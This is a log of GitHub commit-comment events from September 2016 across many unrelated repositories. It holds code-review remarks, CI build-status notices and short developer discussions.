{"id":"4644216728","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19243085,"position":null,"line":null,"path":null,"commit_id":"762337430d45285d10b1777efb9c782411160e26","created_at":"2016-09-30T15:42:59Z","updated_at":"2016-09-30T15:42:59Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1232](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14748&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 231, ignored: 3 Build time: 00:09:30\n### Failed tests\n```\norg.genivi.sota.core.PackageResourceWordSpec: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-30T15:42:59Z"}
{"id":"4644218204","type":"CommitCommentEvent","actor":{"login":"mgaitan"},"repo":{"name":"mgaitan/preciosa"},"payload":{"comment":{"id":19243090,"position":33,"line":33,"path":"tools/scrappers/preciosclaros/preciosclaros/items.py","commit_id":"cee964d1bcf122001ad33004d42f1f71c1b68b6f","created_at":"2016-09-30T15:43:14Z","updated_at":"2016-09-30T15:43:14Z","body":"hace falta?"}},"created_at":"2016-09-30T15:43:14Z"}
{"id":"4644223008","type":"CommitCommentEvent","actor":{"login":"flopywood"},"repo":{"name":"flopywood/flopywood.github.io"},"payload":{"comment":{"id":19243102,"position":1,"line":1,"path":"README.md","commit_id":"e921c83664fe5b190a8feb1cdf6e44568d27c19a","created_at":"2016-09-30T15:44:05Z","updated_at":"2016-09-30T15:44:05Z","body":"tutorial "}},"created_at":"2016-09-30T15:44:05Z"}
{"id":"4644223969","type":"CommitCommentEvent","actor":{"login":"jaymspeights"},"repo":{"name":"jaymspeights/BusRideWithJesus"},"payload":{"comment":{"id":19243105,"position":null,"line":null,"path":null,"commit_id":"1e0de5027f7160971a24ade400498dc4c7fa4bf7","created_at":"2016-09-30T15:44:15Z","updated_at":"2016-09-30T15:44:15Z","body":"Add this to google scripts \r\n\r\nfunction getBuses(){\r\n //gets bus locations from server in format\r\n //{bus1: {lat: #, lng: #}, bus2: {lat: #, lng: #}}\r\n//and returns the above list\r\n}\r\nfunction drawBuses(busLocations)\r\n for bus in busLocations {\r\n  var marker = new google.maps.Marker({\r\n   position: bus,\r\n          icon: {\r\n            path: google.maps.SymbolPath.CIRCLE,\r\n            scale: 10},map: map});\r\n}\r\n"}},"created_at":"2016-09-30T15:44:15Z"}
{"id":"4644224938","type":"CommitCommentEvent","actor":{"login":"Chadster766"},"repo":{"name":"jbsky/McDebian"},"payload":{"comment":{"id":19243111,"position":null,"line":null,"path":null,"commit_id":"cdb6478a1bf432a91bf23b7f8bb2c2731aa6aa22","created_at":"2016-09-30T15:44:26Z","updated_at":"2016-09-30T15:44:26Z","body":"For the reset I was thinking of finding a Debian package that automatically backups up the system. Then if the reset button is pressed the script would pull from the last system configuration that was backed up by the automated backup software.\r\n\r\nA quick search seem to find a few command line backup packages for Debian."}},"created_at":"2016-09-30T15:44:26Z"}
{"id":"4644226037","type":"CommitCommentEvent","actor":{"login":"arthurnn"},"repo":{"name":"cheshire137/test_fork"},"payload":{"comment":{"id":19243114,"position":null,"line":null,"path":null,"commit_id":"43875eeb9e62b3140e629a4a316384070668ab3c","created_at":"2016-09-30T15:44:36Z","updated_at":"2016-09-30T15:44:36Z","body":"❤️ "}},"created_at":"2016-09-30T15:44:36Z"}
{"id":"4644234557","type":"CommitCommentEvent","actor":{"login":"osahyoun"},"repo":{"name":"SumOfUs/Champaign"},"payload":{"comment":{"id":19243143,"position":2,"line":2,"path":"app/services/auth_token_verifier.rb","commit_id":"c147ac6652f3cab2b2acafcf2873172ba65c5477","created_at":"2016-09-30T15:46:06Z","updated_at":"2016-09-30T15:46:06Z","body":"Sorry, @Tuuleh. Friday (last week) was a manic day - I was just totally fixed on trying to get all the bits integrated and working before the weekend."}},"created_at":"2016-09-30T15:46:06Z"}
{"id":"4644236756","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19243156,"position":null,"line":null,"path":null,"commit_id":"8fc35b35790a321ac8b86e07f65b1923a4cb9ce8","created_at":"2016-09-30T15:46:28Z","updated_at":"2016-09-30T15:46:28Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.277.8fc35b35790a321ac8b86e07f65b1923a4cb9ce8](http://build.palaso.org/viewLog.html?buildId=77295&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **FAILURE**\nSummary: Execution timeout Build time: 00:35:18"}},"created_at":"2016-09-30T15:46:28Z"}
{"id":"4644237862","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19243158,"position":null,"line":null,"path":null,"commit_id":"fd890654e0fe824ad7b13a6ffb361a93a7cddd50","created_at":"2016-09-30T15:46:39Z","updated_at":"2016-09-30T15:46:39Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1234](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14755&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T15:46:39Z"}
{"id":"4644238172","type":"CommitCommentEvent","actor":{"login":"nkgwj"},"repo":{"name":"sf-arte/Spica"},"payload":{"comment":{"id":19243160,"position":58,"line":58,"path":"Spica/Flickr.swift","commit_id":"1b5584869f242c4100d5d1cc9381dea838dd4760","created_at":"2016-09-30T15:46:41Z","updated_at":"2016-09-30T15:46:41Z","body":"以下のようなコードと同じ意味でしょうか\r\n\r\nreturn self.params.map { (params) in \r\n   return  OAuth1Swift(  ...."}},"created_at":"2016-09-30T15:46:41Z"}
{"id":"4644240353","type":"CommitCommentEvent","actor":{"login":"endless-sky"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19243164,"position":null,"line":null,"path":null,"commit_id":"f303fe7c0ab1a76a25a8045314d584bca35ea214","created_at":"2016-09-30T15:47:02Z","updated_at":"2016-09-30T15:47:02Z","body":"No, the nanobots are meant to be their own thing - even if you get on friendly terms with the Mereti, the nanobots should still try to eat your ship, because that's what nanobots do."}},"created_at":"2016-09-30T15:47:02Z"}
{"id":"4644243675","type":"CommitCommentEvent","actor":{"login":"trainline-em-bot"},"repo":{"name":"trainline/environment-manager"},"payload":{"comment":{"id":19243169,"position":null,"line":null,"path":null,"commit_id":"7ec2952a3fdc94f9e74da8c1d2399c5abe17e617","created_at":"2016-09-30T15:47:33Z","updated_at":"2016-09-30T15:47:33Z","body":"TeamCity Platform Services :: Environment Manager :: Run Tests [Build 29](http://infra.teamcity.ci.ttldev/viewLog.html?buildId=33125&buildTypeId=PlatformServices_EnvironmentManager_RunTests) is now running\n"}},"created_at":"2016-09-30T15:47:33Z"}
{"id":"4644253539","type":"CommitCommentEvent","actor":{"login":"DFurnes"},"repo":{"name":"DoSomething/onboarding-service"},"payload":{"comment":{"id":19243199,"position":7,"line":7,"path":"lib/admin.js","commit_id":"9e1d3c4da6a4ca010971ebe837f5ff27e01aba29","created_at":"2016-09-30T15:49:04Z","updated_at":"2016-09-30T15:49:04Z","body":"Huh, that's a bit weird. `'true'` is delivered as a string?"}},"created_at":"2016-09-30T15:49:04Z"}
{"id":"4644259132","type":"CommitCommentEvent","actor":{"login":"deadlybutter"},"repo":{"name":"DoSomething/onboarding-service"},"payload":{"comment":{"id":19243216,"position":7,"line":7,"path":"lib/admin.js","commit_id":"9e1d3c4da6a4ca010971ebe837f5ff27e01aba29","created_at":"2016-09-30T15:49:57Z","updated_at":"2016-09-30T15:49:57Z","body":"Yeah that confused me at first as well"}},"created_at":"2016-09-30T15:49:57Z"}
{"id":"4644259632","type":"CommitCommentEvent","actor":{"login":"peircej"},"repo":{"name":"psychopy/psychopy"},"payload":{"comment":{"id":19243218,"position":null,"line":null,"path":null,"commit_id":"dbfed25c4fa4c0cd8d08d0152fbee7f6a838090b","created_at":"2016-09-30T15:50:02Z","updated_at":"2016-09-30T15:50:02Z","body":"Ah, you're right on that, but it won't hurt. The new refactoring has obscured that it's a single line of comment ;-) I read it as a multiline string."}},"created_at":"2016-09-30T15:50:02Z"}
{"id":"4644261575","type":"CommitCommentEvent","actor":{"login":"emmett9001"},"repo":{"name":"Parsely/pykafka"},"payload":{"comment":{"id":19243226,"position":null,"line":null,"path":null,"commit_id":"9f9e07df99ae05383724820cccb126a3e33ef2a4","created_at":"2016-09-30T15:50:22Z","updated_at":"2016-09-30T15:50:22Z","body":"@jianbin-wei I think I get what you're saying, but my knowledge of greenlets is maybe not deep enough to see the gotchas that would arise from this (we don't use gevent at Parse.ly). Would you be able to open a pull request that demonstrates your proposed fix?"}},"created_at":"2016-09-30T15:50:22Z"}
{"id":"4644262333","type":"CommitCommentEvent","actor":{"login":"jaymspeights"},"repo":{"name":"jaymspeights/BusRideWithJesus"},"payload":{"comment":{"id":19243229,"position":null,"line":null,"path":null,"commit_id":"1e0de5027f7160971a24ade400498dc4c7fa4bf7","created_at":"2016-09-30T15:50:30Z","updated_at":"2016-09-30T15:50:30Z","body":"List format in busLocations should actually look like\r\n{bus: [{lat: #, lng: #}, {lat: #, lng: #}]}\r\nSorry"}},"created_at":"2016-09-30T15:50:30Z"}
{"id":"4644266656","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"npct/pct-shiny"},"payload":{"comment":{"id":19243251,"position":null,"line":null,"path":null,"commit_id":"7a0ee34468f90c3eb5a92a929e3a968c0c3fe4d6","created_at":"2016-09-30T15:51:14Z","updated_at":"2016-09-30T15:51:14Z","body":"Here's the reasoning: \"The app does not use that code, it's irrelevant to other users and other countries, so should be deleted from \" - from this PR https://github.com/npct/pct-shiny/pull/410 accepted by @usr110 "}},"created_at":"2016-09-30T15:51:14Z"}
{"id":"4644271344","type":"CommitCommentEvent","actor":{"login":"Yomodo"},"repo":{"name":"ProximoSrl/Jarvis.DocumentStore"},"payload":{"comment":{"id":19243261,"position":null,"line":null,"path":null,"commit_id":"aa7b43d1ca16f9d5de4e98339057368ba7301ee2","created_at":"2016-09-30T15:52:01Z","updated_at":"2016-09-30T15:52:01Z","body":"@alkampfergit Perhaps you would like to take a look at AlphaFS.\r\nhttps://github.com/alphaleonis/AlphaFS\r\n"}},"created_at":"2016-09-30T15:52:01Z"}
{"id":"4644271717","type":"CommitCommentEvent","actor":{"login":"deadlybutter"},"repo":{"name":"DoSomething/onboarding-service"},"payload":{"comment":{"id":19243264,"position":7,"line":7,"path":"lib/admin.js","commit_id":"9e1d3c4da6a4ca010971ebe837f5ff27e01aba29","created_at":"2016-09-30T15:52:06Z","updated_at":"2016-09-30T15:52:06Z","body":"I originally tried doing just true but it was converted to a string, maybe it's an http thing?"}},"created_at":"2016-09-30T15:52:06Z"}
{"id":"4644274438","type":"CommitCommentEvent","actor":{"login":"trainline-em-bot"},"repo":{"name":"trainline/environment-manager"},"payload":{"comment":{"id":19243275,"position":null,"line":null,"path":null,"commit_id":"7ec2952a3fdc94f9e74da8c1d2399c5abe17e617","created_at":"2016-09-30T15:52:32Z","updated_at":"2016-09-30T15:52:32Z","body":"TeamCity Platform Services :: Environment Manager :: Run Tests [Build 29](http://infra.teamcity.ci.ttldev/viewLog.html?buildId=33125&buildTypeId=PlatformServices_EnvironmentManager_RunTests) outcome was **SUCCESS**\nSummary: Tests passed: 421 Build time: 00:04:59"}},"created_at":"2016-09-30T15:52:32Z"}
{"id":"4644276003","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19243280,"position":null,"line":null,"path":null,"commit_id":"66ec62150396c61f12e2fdd13adacdbf902b73cf","created_at":"2016-09-30T15:52:48Z","updated_at":"2016-09-30T15:52:48Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1233](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14751&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:10:52"}},"created_at":"2016-09-30T15:52:48Z"}
{"id":"4644281117","type":"CommitCommentEvent","actor":{"login":"duncanhall"},"repo":{"name":"trainline/environment-manager"},"payload":{"comment":{"id":19243291,"position":null,"line":null,"path":null,"commit_id":"7ec2952a3fdc94f9e74da8c1d2399c5abe17e617","created_at":"2016-09-30T15:53:41Z","updated_at":"2016-09-30T15:53:41Z","body":"This is why we should build on linux !"}},"created_at":"2016-09-30T15:53:41Z"}
{"id":"4644281325","type":"CommitCommentEvent","actor":{"login":"MonoGitSoft"},"repo":{"name":"Ezzence/slam_ros"},"payload":{"comment":{"id":19243292,"position":null,"line":null,"path":null,"commit_id":"4161dcc180d458d5c9bc2ebeea4243f85e6e4c46","created_at":"2016-09-30T15:53:43Z","updated_at":"2016-09-30T15:53:43Z","body":"Ezt kellet átirni, ha minden igaz most már jo lesz\r\n"}},"created_at":"2016-09-30T15:53:43Z"}
{"id":"4644282426","type":"CommitCommentEvent","actor":{"login":"DFurnes"},"repo":{"name":"DoSomething/onboarding-service"},"payload":{"comment":{"id":19243297,"position":null,"line":null,"path":null,"commit_id":"9e1d3c4da6a4ca010971ebe837f5ff27e01aba29","created_at":"2016-09-30T15:53:54Z","updated_at":"2016-09-30T15:53:54Z","body":"Looks okay to me. 👍 "}},"created_at":"2016-09-30T15:53:54Z"}
{"id":"4644282879","type":"CommitCommentEvent","actor":{"login":"mkiol"},"repo":{"name":"mkiol/GNotifier"},"payload":{"comment":{"id":19243298,"position":null,"line":null,"path":null,"commit_id":"d39d2af65365684c77ab75b6ee8b6acc12c0c537","created_at":"2016-09-30T15:53:58Z","updated_at":"2016-09-30T15:53:58Z","body":"Right... thanks! Your any sugestions are more than welcome."}},"created_at":"2016-09-30T15:53:58Z"}
{"id":"4644286917","type":"CommitCommentEvent","actor":{"login":"u0324096"},"repo":{"name":"u0324096/hello-world"},"payload":{"comment":{"id":19243309,"position":null,"line":null,"path":null,"commit_id":"d33866a39e3206b36b1076e7bbd0133273ee1fa8","created_at":"2016-09-30T15:54:38Z","updated_at":"2016-09-30T15:54:38Z","body":"資管3B 0324096 蕭煒臻"}},"created_at":"2016-09-30T15:54:38Z"}
{"id":"4644287840","type":"CommitCommentEvent","actor":{"login":"tbarsballe"},"repo":{"name":"geoserver/geoserver"},"payload":{"comment":{"id":19243312,"position":18,"line":67,"path":"src/web/core/src/main/java/org/geoserver/web/data/store/WMSStoreNewPage.java","commit_id":"79fd8dba4ecef792bd0f56ce47da7b8d6dc6b0b0","created_at":"2016-09-30T15:54:47Z","updated_at":"2016-09-30T15:54:47Z","body":"Hi Alessio\n\nYes, I know we must save the saved store - however we are no longer cloning\nthe info object into the saved store, so all its values are null. Instead\nof cloning into the expandedStore the second time around, we should be\ncloning into the savedStore, as was done previously.\n\nTorben\n\nOn Fri, Sep 30, 2016 at 2:17 AM, Alessio Fabiani <notifications@github.com>\nwrote:\n\n> Hi Torben, the logic is right, we must save the \"savedStore\". The\n> \"expandedStore\" is useful only to test the connection parameters. The idea\n> is: I have variables among the connectionParams and I want to store those\n> variables. At the same time I need to validate the store before saving it.\n> At this point I expand the variables, test the store and then I save the\n> original one.\n>\n> The exception may depend from an issue on the clone method, and this is\n> what we have to understand exactly. I'm going to do more tests on this\n> direction.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/geoserver/geoserver/commit/79fd8dba4ecef792bd0f56ce47da7b8d6dc6b0b0#commitcomment-19238337>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AI14ycDrBLFf66QHIeG3dy1P8zSNl7L_ks5qvNONgaJpZM4KKWJr>\n> .\n>\n"}},"created_at":"2016-09-30T15:54:47Z"}
{"id":"4644289779","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19243317,"position":34,"line":37,"path":"it/mozorg/newsletters.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T15:55:08Z","updated_at":"2016-09-30T15:55:08Z","body":"Magari mente invece di cuore?"}},"created_at":"2016-09-30T15:55:08Z"}
{"id":"4644292085","type":"CommitCommentEvent","actor":{"login":"ljschumacher"},"repo":{"name":"ver228/Multiworm_Tracking"},"payload":{"comment":{"id":19243330,"position":null,"line":null,"path":null,"commit_id":"312851003b5f163c79ca0af825095a7606a6d7fb","created_at":"2016-09-30T15:55:33Z","updated_at":"2016-09-30T15:55:33Z","body":"Unfortunately the alias for \"is_fluorescence\" is incorrect. Note: Fluorescent images have a dark background, not a light background."}},"created_at":"2016-09-30T15:55:33Z"}
{"id":"4644294509","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19243335,"position":null,"line":null,"path":null,"commit_id":"2ac3f5cbb884a5de6df49ea1513c55579d66e5db","created_at":"2016-09-30T15:55:57Z","updated_at":"2016-09-30T15:55:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1235](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14762&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T15:55:57Z"}
{"id":"4644297530","type":"CommitCommentEvent","actor":{"login":"ooxi"},"repo":{"name":"jOOQ/jOOQ"},"payload":{"comment":{"id":19243345,"position":142,"line":367,"path":"jOOQ/src/main/java/org/jooq/SQLDialect.java","commit_id":"733496d283753826400007b88c12be78f49f7a07","created_at":"2016-09-30T15:56:27Z","updated_at":"2016-09-30T15:56:27Z","body":"Just a minor addition: why is it called runnable when the field is called `executor`?"}},"created_at":"2016-09-30T15:56:27Z"}
{"id":"4644297649","type":"CommitCommentEvent","actor":{"login":"geophree"},"repo":{"name":"tes/redux-plupload"},"payload":{"comment":{"id":19243346,"position":null,"line":null,"path":null,"commit_id":"b15016b48e3d3a9fdd7cd1579726db95bc2910ee","created_at":"2016-09-30T15:56:28Z","updated_at":"2016-09-30T15:56:28Z","body":"I'm not going to replace `import`s with `require`s.  It should work fine if you include `babel-runtime` in your project, which this module has a `peerDependency` on.  Did you try that?  It doesn't look like you have it in your `package.json` if this the right branch:  https://github.com/tes/app-application-tracker/blob/add-candidate-upload/package.json"}},"created_at":"2016-09-30T15:56:28Z"}
{"id":"4644302206","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19243363,"position":34,"line":37,"path":"it/mozorg/newsletters.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T15:57:16Z","updated_at":"2016-09-30T15:57:16Z","body":"Va bene, è molto meglio anche se si discosta un po' dall'originale.\n\n\n"}},"created_at":"2016-09-30T15:57:16Z"}
{"id":"4644302927","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19243366,"position":null,"line":null,"path":null,"commit_id":"fd890654e0fe824ad7b13a6ffb361a93a7cddd50","created_at":"2016-09-30T15:57:23Z","updated_at":"2016-09-30T15:57:23Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1234](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14755&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:10:45"}},"created_at":"2016-09-30T15:57:23Z"}
{"id":"4644303423","type":"CommitCommentEvent","actor":{"login":"GiovanniBussi"},"repo":{"name":"plumed/plumed2"},"payload":{"comment":{"id":19243369,"position":null,"line":null,"path":null,"commit_id":"21b5e2ea97ce32b9fe654d7ac585acac5a445e33","created_at":"2016-09-30T15:57:29Z","updated_at":"2016-09-30T15:57:29Z","body":"@maxbonomi if size is fixed you can use Tensor so that you can access with [i][j] syntax.\r\nThis should be as fast as VectorGeneric<9>, perhaps with a better syntax. Matrix is only good for large objects of unknown size."}},"created_at":"2016-09-30T15:57:29Z"}
{"id":"4644305024","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"thotro/arduino-dw1000"},"payload":{"comment":{"id":19243374,"position":null,"line":null,"path":null,"commit_id":"c8bcd0edf85aef76b3751848159478507d64a73b","created_at":"2016-09-30T15:57:47Z","updated_at":"2016-09-30T15:57:47Z","body":"Hi,\r\n For interfacing arduino with DW1000 have you use the libraries available in decawave official site or there is modification to it."}},"created_at":"2016-09-30T15:57:47Z"}
{"id":"4644308135","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"thotro/arduino-dw1000"},"payload":{"comment":{"id":19243380,"position":null,"line":null,"path":null,"commit_id":"8495408869e2bc23eaaaa79b49f52968f5123506","created_at":"2016-09-30T15:58:20Z","updated_at":"2016-09-30T15:58:20Z","body":"Hi,\r\n For interfacing arduino with DW1000 have you use the libraries available in decawave official site or there is modification to it."}},"created_at":"2016-09-30T15:58:20Z"}
{"id":"4644310122","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"thotro/arduino-dw1000"},"payload":{"comment":{"id":19243388,"position":null,"line":null,"path":null,"commit_id":"94458f6274bb8cd7cd26741531aaf4804bcf0e9c","created_at":"2016-09-30T15:58:42Z","updated_at":"2016-09-30T15:58:42Z","body":"Hi,\r\n For interfacing arduino with DW1000 have you use the libraries available in decawave official site or there is modification to it."}},"created_at":"2016-09-30T15:58:42Z"}
{"id":"4644311090","type":"CommitCommentEvent","actor":{"login":"meg-gupta"},"repo":{"name":"Microsoft/ChakraCore"},"payload":{"comment":{"id":19243392,"position":null,"line":null,"path":null,"commit_id":"fd908186135a4c7b8cbdea2b630762a23761ec87","created_at":"2016-09-30T15:58:49Z","updated_at":"2016-09-30T15:58:49Z","body":"LGTM"}},"created_at":"2016-09-30T15:58:49Z"}
{"id":"4644311471","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"thotro/arduino-dw1000"},"payload":{"comment":{"id":19243394,"position":null,"line":null,"path":null,"commit_id":"465328c8e7e272fbccc10491654f97306bdb0201","created_at":"2016-09-30T15:58:56Z","updated_at":"2016-09-30T15:58:56Z","body":"Hi,\r\n For interfacing arduino with DW1000 have you use the libraries available in decawave official site or there is modification to it."}},"created_at":"2016-09-30T15:58:56Z"}
{"id":"4644312210","type":"CommitCommentEvent","actor":{"login":"ravisrhyme"},"repo":{"name":"ravisrhyme/CTCI"},"payload":{"comment":{"id":19243398,"position":null,"line":null,"path":null,"commit_id":"80d085152e821d4570379a97a2ef733872685dde","created_at":"2016-09-30T15:59:04Z","updated_at":"2016-09-30T15:59:04Z","body":"@priyaananthasankar  : Can you review this once ? Let me know if you feel any condition to be wierd !!"}},"created_at":"2016-09-30T15:59:04Z"}
{"id":"4644312839","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"thotro/arduino-dw1000"},"payload":{"comment":{"id":19243400,"position":null,"line":null,"path":null,"commit_id":"aab155658fe2621282c751e7f6f448377767dfa8","created_at":"2016-09-30T15:59:10Z","updated_at":"2016-09-30T15:59:10Z","body":"Hi,\r\n For interfacing arduino with DW1000 have you use the libraries available in decawave official site or there is modification to it."}},"created_at":"2016-09-30T15:59:10Z"}
{"id":"4644316190","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"thotro/arduino-dw1000"},"payload":{"comment":{"id":19243417,"position":null,"line":null,"path":null,"commit_id":"5db536bd7af86cc12f41c4fe0a90ec4a63a514d5","created_at":"2016-09-30T15:59:47Z","updated_at":"2016-09-30T15:59:47Z","body":"Hi,\r\n For interfacing arduino with DW1000 have you use the libraries available in decawave official site or there is modification to it."}},"created_at":"2016-09-30T15:59:47Z"}
{"id":"4644317131","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19243419,"position":null,"line":null,"path":null,"commit_id":"66ec62150396c61f12e2fdd13adacdbf902b73cf","created_at":"2016-09-30T15:59:58Z","updated_at":"2016-09-30T15:59:58Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1236](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14766&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T15:59:58Z"}
{"id":"4644318985","type":"CommitCommentEvent","actor":{"login":"YumeMichi"},"repo":{"name":"SlimRoms/android_build"},"payload":{"comment":{"id":19243423,"position":null,"line":null,"path":null,"commit_id":"5aae5f32bc94ee6ea417f040b94172139dbf3e42","created_at":"2016-09-30T16:00:15Z","updated_at":"2016-09-30T16:00:15Z","body":"Where is the services.slim.jar?"}},"created_at":"2016-09-30T16:00:15Z"}
{"id":"4644320363","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"thotro/arduino-dw1000"},"payload":{"comment":{"id":19243427,"position":null,"line":null,"path":null,"commit_id":"b8d33b9b45eb935e0abd2f95f556cb3fcf8a2997","created_at":"2016-09-30T16:00:28Z","updated_at":"2016-09-30T16:00:28Z","body":"Hi,\r\n For interfacing arduino with DW1000 have you use the libraries available in decawave official site or there is modification to it."}},"created_at":"2016-09-30T16:00:28Z"}
{"id":"4644321303","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":19243429,"position":null,"line":null,"path":null,"commit_id":"9ebc5e6afba6deb485647159c2a4927cec62a480","created_at":"2016-09-30T16:00:38Z","updated_at":"2016-09-30T16:00:38Z","body":"were is that repo?"}},"created_at":"2016-09-30T16:00:38Z"}
{"id":"4644321641","type":"CommitCommentEvent","actor":{"login":"bertfrees"},"repo":{"name":"daisy/pipeline-scripts"},"payload":{"comment":{"id":19243431,"position":1,"line":1,"path":"html-to-dtbook/poms/bom/pom.xml","commit_id":"28caef4508438413bf1b6f1171f7de9fcca731bf","created_at":"2016-09-30T16:00:41Z","updated_at":"2016-09-30T16:00:41Z","body":"@josteinaj Did you add this file by mistake?"}},"created_at":"2016-09-30T16:00:41Z"}
{"id":"4644322334","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"thotro/arduino-dw1000"},"payload":{"comment":{"id":19243433,"position":null,"line":null,"path":null,"commit_id":"510d1c1c3df0b8f828b3306dffbdcb2be5e658cc","created_at":"2016-09-30T16:00:49Z","updated_at":"2016-09-30T16:00:49Z","body":"Hi,\r\n For interfacing arduino with DW1000 have you use the libraries available in decawave official site or there is modification to it."}},"created_at":"2016-09-30T16:00:49Z"}
{"id":"4644323248","type":"CommitCommentEvent","actor":{"login":"bertfrees"},"repo":{"name":"daisy/pipeline-scripts"},"payload":{"comment":{"id":19243438,"position":1,"line":1,"path":"html-to-dtbook/poms/parent/pom.xml","commit_id":"28caef4508438413bf1b6f1171f7de9fcca731bf","created_at":"2016-09-30T16:01:00Z","updated_at":"2016-09-30T16:01:00Z","body":"@josteinaj And this one."}},"created_at":"2016-09-30T16:01:00Z"}
{"id":"4644324091","type":"CommitCommentEvent","actor":{"login":"Bauuuuu"},"repo":{"name":"Bauuuuu/android_device_zte_nx512j"},"payload":{"comment":{"id":19243440,"position":null,"line":null,"path":null,"commit_id":"fc67c14c9baa28cc70333176dc8d959a76c9c8e7","created_at":"2016-09-30T16:01:09Z","updated_at":"2016-09-30T16:01:09Z","body":"because we want that it should be taken from the device tree and not from the source code"}},"created_at":"2016-09-30T16:01:09Z"}
{"id":"4644327251","type":"CommitCommentEvent","actor":{"login":"deepu105"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":19243448,"position":null,"line":null,"path":null,"commit_id":"d225369a621775e18fac8f841bc189c35ec69023","created_at":"2016-09-30T16:01:43Z","updated_at":"2016-09-30T16:01:43Z","body":"👍 "}},"created_at":"2016-09-30T16:01:43Z"}
{"id":"4644330711","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":19243459,"position":null,"line":null,"path":null,"commit_id":"9ebc5e6afba6deb485647159c2a4927cec62a480","created_at":"2016-09-30T16:02:21Z","updated_at":"2016-09-30T16:02:21Z","body":"https://github.com/calamares/calamares-tools\r\n\r\nThe unstable package is from my fork until the PR went in upstream."}},"created_at":"2016-09-30T16:02:21Z"}
{"id":"4644333025","type":"CommitCommentEvent","actor":{"login":"mgol"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":19243467,"position":6,"line":242,"path":"src/ng/anchorScroll.js","commit_id":"9062bae05c002934fe7bfd76043dcc3de9acfde6","created_at":"2016-09-30T16:02:43Z","updated_at":"2016-09-30T16:02:43Z","body":"Why don't we just always cast the input to string in that case?"}},"created_at":"2016-09-30T16:02:43Z"}
{"id":"4644336532","type":"CommitCommentEvent","actor":{"login":"mgol"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":19243480,"position":6,"line":242,"path":"src/ng/anchorScroll.js","commit_id":"9062bae05c002934fe7bfd76043dcc3de9acfde6","created_at":"2016-09-30T16:03:20Z","updated_at":"2016-09-30T16:03:20Z","body":"Also, these nested ternaries are not very readable, could we [disallow](http://eslint.org/docs/rules/no-nested-ternary) them?"}},"created_at":"2016-09-30T16:03:20Z"}
